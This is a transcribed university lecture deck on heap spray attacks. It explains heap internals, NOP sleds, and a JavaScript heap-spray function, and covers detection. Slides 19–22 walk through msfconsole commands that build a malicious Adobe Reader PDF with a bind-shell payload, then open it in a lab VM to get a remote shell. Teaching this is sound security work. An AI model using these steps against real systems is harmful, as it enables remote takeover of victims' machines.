Heaps of Heap-based Memory Attacks

Transcription

1 Heaps of Heap-based Memory Attacks Kevin Leach Center for Secure Information Systems 3 October 2012 K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

2 Goals During this lecture, you will be exposed to 1. How heaps function on different platforms 2. How and why heap spray attacks function 3. How to detect and analyze heap spray attacks 4. How to use Metasploit to produce attack samples K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

3 What is Heap Memory? Very different from the heap data structure (i.e., not the heap from heap sort ) Programs require storage for variables, buffers, etc. int x[50]; This is a static variable, located on the stack. Consider int x[n]; where n is an input. In essence: What happens when you don t know how large a variable needs to be? Notepad can handle arbitrarily large text files Does it allocate 1GB all the time just because it might need to open 1GB files? K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

4 Overview of Dynamic Memory Managed by OS Allocated dynamically as process executes Must be deallocated (e.g., free or garbage collection) Heap structure highly platform-dependent Windows maintains multiple heaps for each process Default heap C Runtime heap (C-based allocators like malloc()) Application private heaps (created via HeapCreate()) Linux has only one heap per thread Allocated one page at a time via sbrk system call typically managed by an allocator (e.g., glibc) Specialized allocator implementations K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

5 Overview of Dynamic Memory Heap memory Contiguous virtual memory, some allocated Free List Maintains free blocks in the heap 0xFFFF PrevSize Size size 1 b 1 b 2 b 3 b n Other Metadata... Data... size 2 size 3 c 1 c 2 c n size 4 d 1 Allocated blocks may... not be contiguous size n Contiguous free blocks are typically coalesced. 0x0000 K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

6 Diversion: von Neumann Machine Monolithic memory M contains: Program code P Program data D P D, i.e. Program and data may be the same! CPU with program counter I loads M I No distinction as to whether M I P, D Execute MI, increment I Repeat ad nauseam (Fetch/Execute cycle) In other words, data can become instructions in the CPU In any stored program computing machine, data must become code at some point K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

7 Heap Spray Attack Justification Easy deployment in scripting languages Easy to trick users to download infected file Ubiquity of programs that enable injecting code into the heap Popular host-based attack rather than server-based K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

8 Anatomy of a Heap Spray Attack Force vulnerable application to allocate large space in heap Typically use high-level scripting languages (JavaScript, ActionScript) Trivially deployed (godaddy + HTML, PDF with embedded JavaScript) Easy obfuscation (rename variables) Evades network intrusion detection systems Not necessarily malicious It is perfectly fine to allocate giant arrays in your JavaScript code Add binary code into the heap Typically lots of NOP-like instructions followed by shellcode Opportunity for polymorphism K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

9 Anatomy of a Heap Spray Attack Exploit a vulnerability that enables mutating program counter (EIP) Hopefully, the EIP lands in the heap and the malicious code will execute Improve likelihood of success via NOP sled and/or copying the payload multiple times Consider: Heap spray attacks 1 exist because all modern computing machines follow the von Neumann machine model! 2 Separating instructions from data solves the problem (Harvard architecture) Impractical to make such a sweeping architectural change 1 In fact, most memory-based attacks 2 a.k.a the Princeton architecture K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

10 Polymorphic Heap Spray Attacks The nop instruction 90h is not the only instruction that behaves like a NOP. Consider w, the set of registers used by the payload. If w i = 0 i eip pre < eip post < eip payload, then the payload will execute correctly. In other words, any sequence of instructions that has a net zero effect on all registers used by the payload behave like a NOP sled, provided it does not jump over the payload. Giant number of permutations in your NOP sled Increases (marginally) the risk of payload failure K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

11 Example - Overview 1 f u n c t i o n s p r a y s h e l l c o d e ( ) { 2 bbb = unescape ( #{e s c a p e d p a y l o a d } ) ; // a r b i t r a r y p a y l o a d 3 ccc = u nescape ( %u0c0c ) ; // o r ecx, 0Ch 4 ccc += ccc ; // produce word l e n g t h 5 6 w h i l e ( ccc. length < (0 x x8000 ) ) ccc += ccc ; 7 8 i 1 = 0 x0c0c 0 x24 ; ddd = ccc. s u b s t r i n g ( 0, i 1 / 2 ) ; 9 ddd += bbb ; // i n s e r t p a y l o a d 10 ddd += ccc ; // more nopsled i 2 = 0 x xc000 ; eee = ddd. s u b s t r i n g ( 0, i 2 / 2 ) ; f o r ( ; eee. l e n g t h < 0 x x40000 ; ) eee += eee ; 15 // copy t h e nop payload nop r e g i o n m u l t i p l e t i m e s i3 = (0 x1020 0x08 ) / 2 ; 18 f f f = eee. s u b s t r i n g ( 0, 0 x80000 i 3 ) ; 19 // ensure maximal length f o r element ggg = new A r r a y ( ) ; // d y n a m i c a l l y a l l o c a t e d i n heap f o r ( hhh = 0 ; hhh < 0x1e0 + 0x10 ; hhh++) ggg [ hhh ] = f f f + s ; 24 // dump the code a l l over the heap ( ggg array ) 25 } K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

12 Example bbb = unescape ( #{e s c a p e d p a y l o a d } ) ; 2 ccc = unescape ( %u0c0c ) ; 3 ccc += ccc ; 4 5 w h i l e ( ccc. l e n g t h < (0 x x8000 ) ) ccc += ccc ; This puts binary representations of the payload (shellcode) and NOP sled. Note that 0x0c0c0c behaves like a NOP sled. It executes or ecx, 0Ch. Also serves as return address K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

13 Example i 1 = 0 x0c0c 0 x24 ; ddd = ccc. s u b s t r i n g ( 0, i 1 / 2 ) ; 2 ddd += bbb ; ddd += ccc ; 3 4 i 2 = 0 x xc000 ; eee = ddd. s u b s t r i n g ( 0, i 2 / 2 ) ; Unimportant... cuts code to size, puts payload between two NOP sleds Essentially, this is done to lower the chance that execution lands in the middle of the shellcode 1 f o r ( ; eee. l e n g t h < 0 x x40000 ; ) eee += eee ; 2 i 3 = (0 x x08 ) / 2 ; 3 f f f = eee. s u b s t r i n g ( 0, 0 x80000 i 3 ) ; Creates packages of NOP-payload-NOP sections K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

14 Example - The Important Part 1 ggg = new Array ( ) ; 2 f o r ( hhh = 0 ; hhh < 0 x1e0 + 0 x10 ; hhh++) 3 ggg [ hhh ] = f f f + s ; This causes the JavaScript engine to make space in the heap (new); The loop copies the package multiple times into this dynamically allocated array. K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

15 Heap Spray Attack Execution 0x3fffffff Stack Stack Free Memory Free Memory Heap Grows up Heap now contains NOP sled and payload 0x Program code... Program code... K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

16 Heap Spray Attack Execution Heap contains many instances of NOP sled and payload This effectively increases the surface area of the attack Do not need the exact address of the payload n: number of payload instances s: size of nop sled, in bytes success: occurs when the payload successfully executes Without NOP sled 3 : P (success) = n 2 32 With NOP sled: Platform transparency Increases running time P (success) = lim sled size s 2 32 P (success) = Assuming uniformly distributed random payload target address in a 4GB address space K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

17 Detecting Heap Spray Attacks Signature of attack code find infected file on disk... find the heap spray function in memory... new exploits will surely become available Signature of payload find the shellcode in memory... extremely small footprint new payloads may become available Signature-based detection is weak NOP sled presence NOP sled is sizable Typically low entropy Easy to detect lots of malloc calls (in an ADS) K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

18 Detecting NOP Sleds Requirement: detect NOP sled before the payload executes Since heap interaction is so slow, we are at an advantage here Allocating 1GB takes on the order of seconds We can ensure detection so long as our system executes more rapidly than the heap spray attack can finish executing. Polling-based? Regular expressions Entropy calculation Behavior-based? Execute in a sandbox, see what happens Microsoft Nozzle Data Execution Prevention? Easy to circumvent (fundamentally, still a von Neumann machine) K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

19 Heap Spray with Metasploit Metasploit framework can produce attack samples Extensible plugin system Ruby scripts that produce attacks Check [/opt/metasploit/]msf3/modules/exploits Allows arbitrary payload insertion with different exploits Can produce vulnerable/malicious files, servers, etc. We will use CVE This is a vulnerability in Adobe Reader 9 and 10 It uses embedded JavaScript to spray the heap Then it uses crafted embedded U3D data to hijack execution You open the PDF, it hangs for a bit, then the payload executes K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

20 Creating the malicious PDF with MSF In Linux with Metasploit installed (e.g. the VCL image): 1. #> msfconsole 2. msfconsole > use exploit/windows/fileformat/adobe reader u3d 3. msfconsole (adobe reader u3d) > show payloads 4. msfconsole (adobe reader u3d) > set PAYLOAD generic/shell bind tcp 5. msfconsole (adobe reader u3d) > set LHOST msfconsole (adobe reader u3d) > exploit This will produce a malicious msf.pdf file under /.msf4 K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

21 Creating the malicious PDF with MSF msfconsole gives you access to the metasploit tools You can use it to produce attack samples, output payloads, inject payloads, or morph attacks The use command instructs the console to work with the given exploit or vulnerability In our case, we re using the adobe reader u3d exploit show payloads lists all of the different shellcodes that can be placed in the given attack Once a payload is chosen (via set PAYLOAD), the attack can be configured The generic/shell bind tcp payload listens on a given port for external connections The Ruby script for each attack is parameterized enable high customization In the case of this exploit, we must set the LHOST variable so that the shell knows which interface to bind to K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

22 Running a heap spray attack 1. (optional) copy the msf file to your home directory 2. Start a Windows XP SP3 Base VCL image and connect to it 3. Download and run this file: (it s Adobe Acrobat 9.4.0) 4. (optional) move your msf.pdf file to this machine Or download: 5. Disable the Windows firewall 6. Open the msf.pdf file (You might have to accept Acrobat s License) Sometimes, DEP will catch it and close Adobe. It may take 2-3 attempts for it to execute successfully. 7. open a command prompt (run cmd) 8. run telnet If you used the generic/shell bind tcp payload, you should be connected to a command prompt in your computer (a shell) K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23

23 Discussion If you want to see the actual heap spray, download and install CheatEngine Attach to the AdobeRdr32 process Search for the hex string, 0c0c0c0c0c0c0c0c You can see the NOP sled and payload in memory K. Leach (CSIS) Heaps of Heap-based Memory Attacks 3 October / 23